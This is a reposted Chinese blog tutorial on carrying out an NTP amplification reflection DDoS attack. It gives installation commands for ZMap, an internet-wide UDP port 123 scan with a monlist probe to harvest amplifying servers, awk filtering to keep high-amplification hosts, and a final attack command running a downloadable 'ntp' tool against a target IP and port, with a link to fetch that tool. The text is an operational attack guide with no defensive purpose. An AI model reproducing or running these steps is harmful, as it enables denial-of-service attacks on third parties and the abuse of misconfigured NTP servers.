码迷,mamicode.com
首页 > 其他好文 > 详细

NTP放大反射攻击扫描列表教程

时间:2018-12-02 10:28:33      阅读:3233      评论:0      收藏:0      [点我收藏+]

标签:chmod   get   系统设置   stat   反射攻击   完成   tps   arc   系统版本   

1.升级所有包,改变软件设置和系统设置,系统版本内核都升级

yum -y update

2.下载rpm包(区分centos6 与centos7 执行不同的命令)

centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm

3.安装必要的依赖环境

yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

--------------------------------------------扫描过滤列表-----------------------------------------------

4.安装Zmap

wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
tar -zxvf v1.0.3.tar.gz  
cd /root/zmap-1.0.3
cd src/
make
make install

ZMap安装完成,可以运行如下命令测试:

zmap -p 80 -N 10 -B 1M -o -   #很快,程序会输出10个Internet上打开了80端口的主机的IP,你也可以换成22端口23端口试试。具体的用法可以参考ZMap官方文档。

5.开始扫描NTP放大列表

screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
如果在扫描时,你与服务器的会话不小心中断。
你可以重新连接服务器。
使用命令screen -r回到会话。
screen是将程序独立运行在后台,直到执行完成。

6.过滤列表

chmod 777 ntpchecker #添加权限

screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #运行检查

awk $2>419{print $1} step1.txt | sort -n | uniq | sort -R > ntpamp.txt #过滤列表

--------------------------------------------放大攻击-----------------------------------------------

工具下载至本文:https://www.cnblogs.com/a1d4m/p/10051969.html

7.攻击命令

chmod 777 ntp #赋予权限
./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100

NTP放大反射攻击扫描列表教程

标签:chmod   get   系统设置   stat   反射攻击   完成   tps   arc   系统版本   

原文地址:https://www.cnblogs.com/a1d4m/p/10051965.html

(2)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!